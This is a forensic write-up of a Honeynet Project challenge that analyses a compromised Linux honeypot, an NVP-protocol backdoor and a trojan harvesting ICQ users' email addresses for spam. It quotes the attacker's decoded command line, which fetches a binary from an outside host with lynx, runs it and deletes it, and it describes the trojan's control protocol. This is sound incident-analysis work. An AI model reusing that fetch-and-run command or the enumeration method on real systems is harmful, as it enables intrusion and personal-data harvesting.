Scan of the Month #22 of the Honeynet Project: Analysis of nefarious activity done after penetration of a Linux system.
Write up by: Javier Fernández-Sanguino Peña (jfernandez at germinus dot COM), Germinus Solutions.
First of all the MD5sum of the snort log is checked before decompressing it.
$ md5sum snort-0718\@1401.log.gz 6d0056c385f4d312f731d9506e217314
Since it matches with the one given in the honeynet's page we just decompress it and analyse it first with tcpdump:
$ tcpdump -xX -r snort-0718\@1401.log
Browsing the results we see the following:
there are some ICMP packets separated several hours.
there are some connections using ip protocol 111 (NVP)
there also some FTP conections (together with some dns queries)
some rpc connections are made to the compromised server too
most of the tcpdump file is formed of page downloads from web.icq.com
We test the snort file with snort (including all attacks):
$ sudo snort -r snort-0718\@1401.log -A full -c /etc/snort.conf
Nothing much appears in snort logs, just some warns about ICMP messages and about some anonymous FTP acceses already noticed while browsing the file (see snort results). These seem to be unrelated to the scan of the month. Then we recreate the streams with tcpflow:
$ tcpflow -r snort-0718\@1401.log
and also extract the full snort file for analysis:
$ tcpdump -nxX -s 1500 -r /snort-0718\@1401.log >tcpdump-full.dat
All the web pages are retrieved from web.icq.com. Also they seem to be correlative. Checking web.icq.com these pages seem to hold personal information of the subscribers to the instant messaging service. It is not yet clear what does the attacker whan this for (or what does retrieve the pages).
Ordering by size the tcpflows, we notice a file transfer (216 kbytes). This file transfer is the result of an HTTP request (done with lynx):
GET /foo HTTP/1.0 Host: 216.242.103.2:8882 Accept: text/html, text/plain, audio/mod, image/*, video/*, video/mpeg, application/pgp, application/pgp, application/pdf, message/partial, message/external-body, application/postscript, x-be2, application/andrew-inset, text/richtext, text/enriched Accept: x-sun-attachment, audio-file, postscript-file, default, mail-file, sun-deskset-message, application/x-metamail-patch, text/sgml, */*;q=0.01 Accept-Encoding: gzip, compress Accept-Language: en User-Agent: Lynx/2.8.3dev.18 libwww-FM/2.14
Which is answered with:
HTTP/1.1.200 OK Server: Foobarcatdog1 Content-type: text/x-csrc Content-length: 215464 Accept-Ranges: bytes (... file `foo' ...)
Removing the HTTP header we analyse the download:
$ file suspect-binary suspect-binary: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Now, running 'strings' on it can do some (brief) analysis. It included the web.icq.com string so it most probably was downloaded to the system and used to retrieve those HTML pages. The binary is similar to the one which was part of the forensic challenge (will come back to this later on).
Analysing the rest of the tcpflow's we see that the attacker is accessing HTML pages of users in web.icq.com, the users have consecutive `Uin' (parameter used for the user's unique identifier). Starting at 9207100 down to 9207199. This can be seen analysing the requests sent by the compromised honeynet server:
$ grep ?Uin 172.016.183.002.0*
This accesses are done just after the attacker downloads the 'foo' trojan since it includes an HTTP request string in it with this same format this are obviously related. In any case, this looks, a lot, like user enumeration. But, for what purpose? The first guess is that the attacker is trying to retrieve email addresses, it seems to be the only valuable information in the contents of the web pages:
$ cat 205.188.248.0* | perl -ne 'print $1."\n" if /mailto:(.*?@.*?)/;' |sort -u
Returns 164 mail address: 88 are from icq (pager), 7 from AOL, and 3 from yahoo. The rest (66) are probably valid email address. This is around 40% of the mail addresses retrieved.
After this is done we compile and run the packet decoder provided for the challenge. The commands appear clearly in the decoded file. In order to determine which of the snort's file packets were decoded and which were not we hacked a little bit the program. This allows us to determine which packets are part of the NVP communication and which are not.
The decoded commands sent to the NVP backdoor are:
grep zone /etc/named.conf
killall -9 ttserve(twice)
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve
killall -9 lynx ; rm -rf /tmp/ttserve(four times).
So the attacker looks for DNS information (see question 2), stops previous running processes, then uses lynx to download the trojan (called foo on the server and ttserve on the compromised system), runs it and removes it from the system.
Just to give it a try we do some searchs in google.
First search is for 'ttserve' (the name the attacker gives to the downloaded program 'foo'). It seems to be the handle of a notorius spammer (ttserve@tm.net.my). This ISP is listed in the list of top-100 spammers in Usenet (http://www.newsadmin.com/cgi-bin/newsspam1). Some more research with Google indicates there are a lot of open relays and a lot of problems linked to these ISPs. As a matter of fact there are spam mails as old as 1999 that use this handle. Some references include:
After this we go looking for relevant information on the NVP backdoor. One of the first hits in google is an Analysis made by the Securityfocus DeepSight Threat Management team regarding the backdoor. After reading through it it's evident that this same backdoor is the one used in the challenge. Also note that the Honeyproject's note on the results of the reverse challenge points to the Scans of the Month as a new step related to this compromise so they seem to be quite related.
Just for completeness I downloaded the top ten entries of the forensic challenge and went through them, this information sheds some more light on these challenge since it seems that the NVP backdoor was not just used for user enumeration at web.icq.com but for many other purposes too.
The writeups provide quite a number of useful information that is relevant to the analysis. Specially, the NVP analysis is very useful to analyse how the backdoor communicates with the attacker (which helps answer question 1) and how commands are sent to it.
In any case, after careful black-box analysis of the trojan (see below) I was ready to answer all the questions.
Table of contents:
This question has two answers: 203.173.144.50 and 216.242.103.2. The answer depends on wether we are talking about the IP address used to command the NVP trojan or the 'foo' ('ttserve') trojan.
We must first note that the packets based on the NVP backdoor use spoofed source for the IP address:
$ cat packets/tcpdump-full.dat |grep ip-proto-11 |grep "> 172.16" |cut -f 2 -d " " |sort -u 10.39.81.89 122.255.17.55 168.148.27.14 192.146.201.172 218.209.145.27 26.44.146.84 58.248.76.90 94.0.146.98
And the trojan answers to other addresses:
$ cat packets/tcpdump-full.dat |grep ip-proto-11 |grep "172.16.183.2 >" |cut -f 4 -d " " |sort -u 122.114.160.41 158.217.222.215 175.44.57.180 203.173.144.50 22.23.166.235 31.223.48.171 55.247.104.208 57.35.28.126 73.195.64.167
Of all these there are only two ICMP unreachable packets (for 158.217.222.215 and 175.44.57.180), so they can be discarded. As for the other ones its difficult to know which exactly is the IP address.
Checking the first protocol 11 packet sent to the compromised host, the first bytes includes the following: "00 02 01 CB AD 90 32" which translates into "00 02 01 203 173 144 50". Curious enough, this IP address is one of the addresses used to send the answer to.
After some investigation (and reading the NVP analysis done by Securityfocus' Deepsight team) we can confirm that the first packet sent to the NVP backdoor includes the IP address that should be used to send answers too. The IP address used to communicate with the trojan is 203.173.144.50.
However, the IP address used to communicate with the foo trojan is 216.242.103.2. The tcpdump file shows a communication with a web server on port 8882 of the address 11.11.11.11, however this is incoherent with the fact that in the connection to the web server on port 8882 to download 'foo' the HTTP/1.1 request includes 'Host: 216.242.103.2:8882'. Also, the binary 'foo' (as we will see later on) makes a connection to that IP address (port 53413) which is hardcoded in the binary.
Before downloading foo the attackers sends a 'grep zone /etc/named.conf'. The attacker seems to be looking for a primary (or secondary) DNS server with zones configured. The output of this command is sent to a list of servers which includes the attacker's IP address. The attacker might want to compromise a DNS server to polute DNS addresses or, more probably, add IP addresses to the name server so he can have it make reverse resolution of them.
Why he would want this for? If we jump a bit ahead to question 6 we can infer the attacker is a spammer. One of the procedures used by many mail servers to (try to) reduce spam is to do reverse address resolution for the IP address connecting to them and, also, check if the IP address used is the same as the fully qualified domain given to the mail server (in the HELO or EHLO commands). So he is quite probably looking for DNS servers, if he can control one he can probably leverage it to send even more spam by faking DNS records.
The readable text is the output result of the commands that the trojan executed. Whileas the packets that do not include readable text (but do include some text as it is shown after decoding them with the provided tool) are commands sent to the trojan. These commands are encoded so that intrusion detection tools would not be triggered (if some standard unix commands are used).
Thus, packets #17-#25 are answers sent by the trojan and packets #15-#16 are commands to it.
Foo (also called 'ttserve') is a trojan that "calls home" to the 53413 port at 216.242.103.2. It's purpose is to connect to a web frontend to instant messaging servers (ICQ) and retrieve, through brute-force enumeration, information on users. More specifically, the trojan has been programmed to return all the e-mail addresses found on the pages retrieved.
'Foo' is based on a state machine that works like this:
The state machine for this behavior is:
Send GU --(receive DUx)--> Start search with 'x'->Send SE(X) and email addresses ---| ^ | | | ------------------------------ (receives GOT) ---------------------------------------
Who was it programmed by? This is not an easy question, since the source code of the program is not available and dissasembling is not an easy task (code is staticly linked and stripped). There is some information, however, that can quickly answer the question:
My guess is that the programmer is an amateur. Note that this trojan (and the NVP trojan) are related to honeynet's forensic challenge, probably developed by the same person.
Run the trojan (it detachs itself and runs in the background) and then remove all traces of the trojan from the filesystem (the trojan was downloaded to /tmp).
The attacker most probably wants this information to send spam. There are two things that point in this direction:
Most probably the NVP backdoor would have been prevented and detected in the networks I build. The NVP communication from the compromised machine would have been stopped by the firewall, the firewall would log the non-TCP packets due to it's "default deny" rule (at the end of the rule chain). If the trojan were to send NVP packets continuously they would most probably draw my attention (as I do check firewall logs from time to time). However if (like the 'foo' trojan) it only sent a few number of packets (11) and, if unable to communicate, close himself down it might be missed. It would not, however, be detected by network-based intrusion detection systems since it is not part of their rule based (which is really a problem with NIDS technology, really)
Regarding host-based intrusion detection (not network based) I thought, at first look, that it would be detected by TAMU's Tiger tool (which I have recently become upstream maintainer of). This tool has, as of it's newest release (3.0) a check for unopened sockets by listening processes. I expected it to detect that there was trojan listening on a raw socket for protocol 11. However, I tested it with a sample program (see the source file) and it did not work, so... I fixed it to work (see the new check_listeningprocs script). This new script will be provided with newer versions of Tiger.
Actively monitor firewall logs for suspicious activity.
Install a host-based intrusion detection (such as Tiger, after the changes done to the latest version) that proactively checks processes which open ports (or interfaces in promiscuous mode also used for backdoor communication).
Properly customize intrusion detection systems to report on unknown traffic (that is, traffic "not expected" in the affected zones) and not just rely on the default rules provided for remote-based attacks.
The analysis of the 'foo' binary retrieved from the remote web server was part of the work done as part of the challenge. The binary is staticly linked, and 'strings' shows, among other, the following string: "@(#) The Linux C library 5.3.12". Other valuable strings from the binary are the following:
"(nfsiod)"
"216.242.103.2"
"SE%lu"
"web.icq.com"
"GET /wwp?Uin=%lu HTTP/1.0"
"Host: web.icq.com"
"gethostby*.getanswer: asked for "%s", got "%s""
Note: As a matter of fact, all of these are in the rodata section of the ELF binary, which contains the constant strings and variables of the program. If we use the program hexpdump we can look for this section. The beginning of it is show below:
0002ca40 e8 cb 36 fd ff c2 00 00 28 6e 66 73 69 6f 64 29 |èË6ýÿÂ..(nfsiod)| 0002ca50 00 2f 00 32 31 36 2e 32 34 32 2e 31 30 33 2e 32 |./.216.242.103.2| 0002ca60 00 47 4f 54 00 47 55 0a 00 44 49 45 00 44 55 00 |.GOT.GU..DIE.DU.| 0002ca70 25 6c 75 00 53 45 25 6c 75 0a 00 77 65 62 2e 69 |%lu.SE%lu..web.i| 0002ca80 63 71 2e 63 6f 6d 00 47 45 54 20 2f 77 77 70 3f |cq.com.GET /wwp?| 0002ca90 55 69 6e 3d 25 6c 75 20 48 54 54 50 2f 31 2e 30 |Uin=%lu HTTP/1.0| 0002caa0 0d 0a 48 6f 73 74 3a 20 77 65 62 2e 69 63 71 2e |..Host: web.icq.| 0002cab0 63 6f 6d 0d 0a 0d 0a 00 67 65 74 68 6f 73 74 62 |com.....gethostb| 0002cac0 79 2a 2e 67 65 74 61 6e 73 77 65 72 3a 20 61 73 |y*.getanswer: as| 0002cad0 6b 65 64 20 66 6f 72 20 22 25 73 22 2c 20 67 6f |ked for "%s", go| 0002cae0 74 20 22 25 73 22 00 52 45 53 4f 4c 56 5f 48 4f |t "%s".RESOLV_HO| 0002caf0 53 54 5f 43 4f 4e 46 00 2f 65 74 63 2f 68 6f 73 |ST_CONF./etc/hos| 0002cb00 74 2e 63 6f 6e 66 00 72 00 6f 72 64 65 72 00 20 |t.conf.r.order. | 0002cb10 09 00 72 65 73 6f 6c 76 2b 3a 20 25 73 3a 20 22 |..resolv+: %s: "|
To trace how the binary works the tests where done on a laptop, running Debian GNU/Linux 2.2 (later upgraded to 3.0) disconnected from the network. A chroot environment with the bare minimum to run some analysis tools (strace, ltrace and fenris) together with the bash (see the chroot tree) is used. Also, the trojan is run as a regular user.
An 'strace' shows the following behavior:
The trojan starts with:
execve("./suspect-binary", ["./suspect-binary"], [/* 23 vars */]) = 0 personality(PER_LINUX) = 0 sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x400886b8) = 0 fork() = 2171 [pid 2171] setsid() = 2171 [pid 2171] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x8064854) = 0 [pid 2171] setuid(1) = -1 EPERM (Operation not permitted) [pid 2171] setreuid(65535, 1) = -1 EPERM (Operation not permitted) [pid 2171] fork() = 2172 [pid 2172] sigaction(SIGPIPE, {SIG_IGN}, {SIG_DFL}, 0x400886b8) = 0 [pid 2172] chdir("/") = 0 [pid 2172] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x8064854) = 0 [pid 2172] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3 [pid 2172] fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0 [pid 2172] sendto(3, "GU\n", 3, 0, {sin_family=AF_INET, sin_port=htons(53413), sin_addr=inet_addr("216.242.103.2")}}, 16) = 3
And then keeps in a loop until an answer is received:
alarm(0) = 0 sigprocmask(SIG_SETMASK, [], NULL) = 0 recvfrom(3, 0xbfff7d94, 1000, 0, 0xbfff7d70, 0xbfff7d6c) = -1 EAGAIN (Resource temporarily unavailable) sendto(3, "GU\n", 3, 0, {sin_family=AF_INET, sin_port=htons(53413), sin_addr=inet_addr("216.242.103.2")}}, 16) = 3 sigprocmask(SIG_BLOCK, [ALRM], []) = 0
In order to contact the daemon, the IP address 216.242.103.2 was added to the network card (so that, in fact, the kernel would send the request to the loopback interface) and a simple daemon was kept listening on that port with netcat:
$ nc -u -l -p 53413 216.242.103.2
We also added this in so that we could see what packets were being sent by the trojan:
# tcpdump -ni lo
The trojan tries to receive an answer after sending "GU". Analysing the tcpdump output of the honeynet box we are able to determine that the trojan receives the following string from the remote server: "DU9207100" and, after that, it contacts several DNS servers and then starts contacting web.icq.com.
So, we just send this to the trojan:
$ echo "DU9207100" | nc -u localhost 32774
After this we confirm it tries to look for web.icq.com querying to the local configured DNS server. Since we have no DNS server installed we download and install 'bind' configuring it to make the trojan think it's the primary DNS server for icq.com (see the the DNS configuration and the zone configuration).
open("/etc/host.conf", O_RDONLY) = -1 ENOENT (No such file or directory) gettimeofday({1029263832, 47858}, NULL) = 0 getpid() = 2438 open("/etc/resolv.conf", O_RDONLY) = -1 ENOENT (No such file or directory) uname({sys="Linux", node="XXXXX", ...}) = 0 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3 connect(3, {sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}}, 16) = 0 send(3, "\342\255\1\0\0\1\0\0\0\0\0\0\3web\3icq\3com\0\0\1\0\1", 29, 0) = 29 oldselect(4, [3], NULL, NULL, {5, 0}) = 1 (in [3], left {5, 0}) recvfrom(3, "\342\255\205\200\0\1\0\1\0\1\0\1\3web\3icq\3com\0\0\1\0"..., 1024, 0, {sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 78 close(3) = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3 connect(3, {sin_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0
Once this is done (and we repeat the previous steps) the trojan attempts to connect to our localhost web's server. Asking for the ICQ pages (as described above).
connect(3, {sin_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("127.0.0.1")}}, 16) = 0 sigprocmask(SIG_BLOCK, [ALRM], []) = 0 sigaction(SIGALRM, {0x805583c, [], 0}, {SIG_DFL}, 0x806485c) = 0 time(NULL) = 1029263832 alarm(1) = 0 sigsuspend([]--- SIGALRM (Alarm clock) --- /proc/2438/status: No such file or directory <... sigsuspend resumed> ) = -1 EINTR (Interrupted system call) sigreturn() = ? (mask now [ALRM]) time(NULL) = 1029263833 sigaction(SIGALRM, {SIG_DFL}, NULL, 0x4002d319) = 0 alarm(0) = 0 sigprocmask(SIG_SETMASK, [], NULL) = 0 fcntl(3, F_SETFL, O_RDONLY|O_NONBLOCK) = 0 send(3, "GET /wwp?Uin=1 HTTP/1.0"..., 55, 0) = 55 time(NULL) = 1029263833 time(NULL) = 1029263833 ioctl(3, 0x541b, [27760]) = 0 read(3, "H", 1) = 1 time(NULL) = 1029263833 ioctl(3, 0x541b, [27759]) = 0 read(3, "T", 1) = 1 time(NULL) = 1029263833 ioctl(3, 0x541b, [27758]) = 0 read(3, "T", 1) = 1 time(NULL) = 1029263833 ioctl(3, 0x541b, [27757]) = 0 read(3, "P", 1) = 1 time(NULL) = 1029263833
The behaviour observed is consistent with the snort file output from the honeynet. Looking carefully the binary for the "DU" string we see three more strings which look like commands for the trojan: "SE" (with a parameter), "DIE" or "GOT". Since they are small strings only the first one comes out after a 'strings' output. We test each one of them stracing the daemon to see its behaviour:
recvfrom(3, "DIE\n", 1000, 0, {sin_family=AF_INET, sin_port=htons(32782), sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4 close(3) = 0 _exit(0) = ?
After some analysis and tests we can determine the trojan's state machine (as described previously in Question 4)
Send GU --(receive DUx)--> Start search with 'x'->Send SE(X) and email addresses ---| ^ | | | ------------------------------ (receives GOT) ---------------------------------------
We try also some stress tests to see if the program suffers from overflows:
$ perl -e "print \"DU\".\"a\"x1000000" |nc -u localhost 32790 $ perl -e "print \"DU\".\"9\"x1000000" |nc -u localhost 32790
In the first case the trojan only tries to contact web.icq.com once, asking for Uin=0. In the second case it will only try to contact once asking for Uin=4294967295.
After these tests, we add in the webserver, using one of the HTML answers from the tcpdump file. Since the request is: "GET /wwp?Uin=XXXX" (XXX being the ICQ id it tries to retrieve) we just copy the file to Apache's root directory naming it as 'wwp', and set the default Content-Type to text/html.
A test with the overflow case shows that the trojan will send back to the server:
SE4294967295 9207197@pager.icq.com
If we use any number if will go off and check 101 pages, and then return all the mail addresses it has retrieved from the pages to the remote 53413 port.
Note: I also attempted some reverse engineering with fenris but it was not conclusive since the program could not be traced easily using:
$ fenris -L ~/fenris-0.2/support/fn-libc5.dat -s -o fenris ./suspect-binary
Dissasembling the program could answer many of the questions but since the blackbox analysis has answered already most of them it was not really worth the effort. However, the information (and programs) available as part of the answers of the reverse challenge would be sufficient to decompile the binary.